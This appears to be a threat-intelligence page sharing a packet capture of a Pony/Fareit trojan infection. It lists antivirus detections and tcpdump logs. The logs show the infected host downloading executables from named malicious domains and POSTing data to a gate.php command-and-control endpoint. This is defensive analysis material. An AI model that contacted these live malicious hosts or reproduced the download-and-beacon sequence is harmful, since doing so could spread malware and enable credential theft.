Text Example

Pony Fareit Trojan Downloader Malware Dropper shit.exe indulogstics.com Traffic Analysis PCAP file download

Download Attachments

  • 1 pcap byte_output
    Date added: January 21, 2017 11:39 pm Added by: admin File size: 5 KB Downloads: 120
SHA256: ec3d9d618092ce434b380cff940b0e74163f30b2dc038541267dbdac5011dcbb
File name: byte_outputC44D35F.exe
Detection ratio: 42 / 55
Analysis date: 2017-01-21 23:31:44 UTC ( 0 minutes ago )
Jiangmin Trojan.PSW.Fareit.ide 20170121
K7AntiVirus Riskware ( 0040eff71 ) 20170121
K7GW Riskware ( 0040eff71 ) 20170121
Kaspersky Trojan-PSW.Win32.Fareit.cjuc 20170121
Malwarebytes Spyware.Pony 20170121
McAfee Artemis!92A2A079B555 20170121
McAfee-GW-Edition BehavesLike.Win32.Trojan.ct 20170121
eScan Trojan.GenericKD.4181990 20170121
Microsoft PWS:Win32/Fareit.AC 20170121
Panda Trj/GdSda.A 20170121
Qihoo-360 HEUR/QVM03.0.9D4A.Malware.Gen 20170122
Rising Malware.Strealer!8.1EF-jN8jw17sYES (cloud) 20170121
Sophos Troj/Fareit-BZU 20170121
Symantec ML.Relationship.HighConfidence [Infostealer.Limitail] 20170121
TrendMicro TROJ_FRS.0NA003AJ17 20170121
TrendMicro-HouseCall TROJ_FRS.0NA003AJ17 20170122
VIPRE Trojan.Win32.Generic!BT 20170122
ViRobot Trojan.Win32.Z.Agent.110592.CYL[h] 20170121
Yandex Trojan.PWS.Fareit!knLZJKpbzRw 20170121

2017-01-21 01:41:42.772969 IP 192.168.1.102.50670 > 195.154.34.135.80: Flags [P.], seq 0:307, ack 1, win 256, length 307: HTTP: GET /jazy/byte_outputC44D35F.exe HTTP/1.1
E..[{.@……..f..”….P~$gL4..qP….d..GET /jazy/byte_outputC44D35F.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: arcolermittal.com
Connection: Keep-Alive

017-01-21 01:42:04.921591 IP 192.168.1.102.56672 > 75.75.75.75.53: 13071+ A? indulogstics.com. (34)
E..>G@………fKKKK.`.5.*.a3…………indulogstics.com…..
2017-01-21 01:42:05.056388 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [S], seq 142498271, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Y.@…`….f^d…..P.~Y……. ..%…………..
2017-01-21 01:42:05.176909 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [.], ack 3963894227, win 64240, length 0
E..(Y.@…`….f^d…..P.~Y..D9.P…%………
2017-01-21 01:42:05.177675 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [P.], seq 0:274, ack 1, win 64240, length 274: HTTP: POST /dave/byte/gate.php HTTP/1.0
E..:Y.@…_….f^d…..P.~Y..D9.P…RZ..POST /dave/byte/gate.php HTTP/1.0
Host: indulogstics.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 339
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
2017-01-21 01:42:05.301201 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [P.], seq 274:613, ack 1, win 64240, length 339: HTTP
E..{Y.@…_….f^d…..P.~Z..D9.P…cp…..?W…8A….H+…mQr.Z..Oj…Hu..v……..h..1…?(……..)8………
…3.Z…..4..*..h-~m.C.)……..D5/z..|x(Cj.1.8.f(k.ak)..ug…….1..~.A*…8……./.’32.'”..i.4..@…H*….p…..T..w…..[…..gR…im_.~.c8.L.@…e….Yl.W….\e&……%Er..E.S..?A..;..0xu….3U…gM……o..0-q.).x..n.o.6.2…j…….Q……..P…y^.b..H.S..A.
2017-01-21 01:42:05.504234 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [.], ack 227, win 64015, length 0
E..(Y.@…`….f^d…..P.~\E.D:.P…#z……..
2017-01-21 01:42:05.528779 IP 192.168.1.102.50672 > 94.100.31.218.80: Flags [F.], seq 613, ack 227, win 64015, length 0
E..(Y.@…`….f^d…..P.~\E.D:.P…#y……..
2017-01-21 01:42:05.533849 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [S], seq 3717785004, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4Y.@…`….f^d…..P………. ..<…………..
2017-01-21 01:42:05.655627 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [.], ack 3370541074, win 64240, length 0
E..(Y.@…`….f^d…..P……`.P………….
2017-01-21 01:42:05.656350 IP 192.168.1.102.50673 > 94.100.31.218.80: Flags [P.], seq 0:186, ack 1, win 64240, length 186: HTTP: GET /dave/byte/shit.exe HTTP/1.0
E…Y.@…` …f^d…..P……`.P…….GET /dave/byte/shit.exe HTTP/1.0
Host: indulogstics.com
Accept: */*
Accept-Encoding: identity, *;q=0
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

Leave a Reply